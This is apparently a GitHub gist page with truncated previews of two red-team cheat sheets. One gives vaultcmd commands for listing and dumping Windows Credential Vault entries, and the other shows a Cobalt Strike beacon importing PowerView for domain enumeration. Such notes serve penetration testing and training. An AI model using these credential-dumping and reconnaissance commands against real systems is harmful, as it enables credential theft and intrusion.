Skip to content

Instantly share code, notes, and snippets.

View alexdhital's full-sized avatar

Alex Dhital alexdhital

View GitHub Profile
@alexdhital
alexdhital / Dump Windows Credential Vault and Scheduled Tasks Credentials.md
Last active September 20, 2024 10:37
Dump Credentials From Windows Credential Vault and Scheduled Tasks

Credential vault

Works only when running as same user whose credentials we are dumping

List vaults

C:\Users\Alex\Desktop> vaultcmd /list

List available credentials in vault

C:\Users\Alex\Desktop> vaultcmd /listcreds:"<vault-name>" /all
@alexdhital
alexdhital / Cobalt Strike PowerView Cheatsheet.md
Last active September 20, 2024 10:40
Cobalt Strike PowerView Cheatsheet

Domain Enumeration

Import PowerView

beacon> powershell-import C:\Users\Alex\Desktop\PowerSploit\Recon\PowerView.ps1

Domain, Forest Recon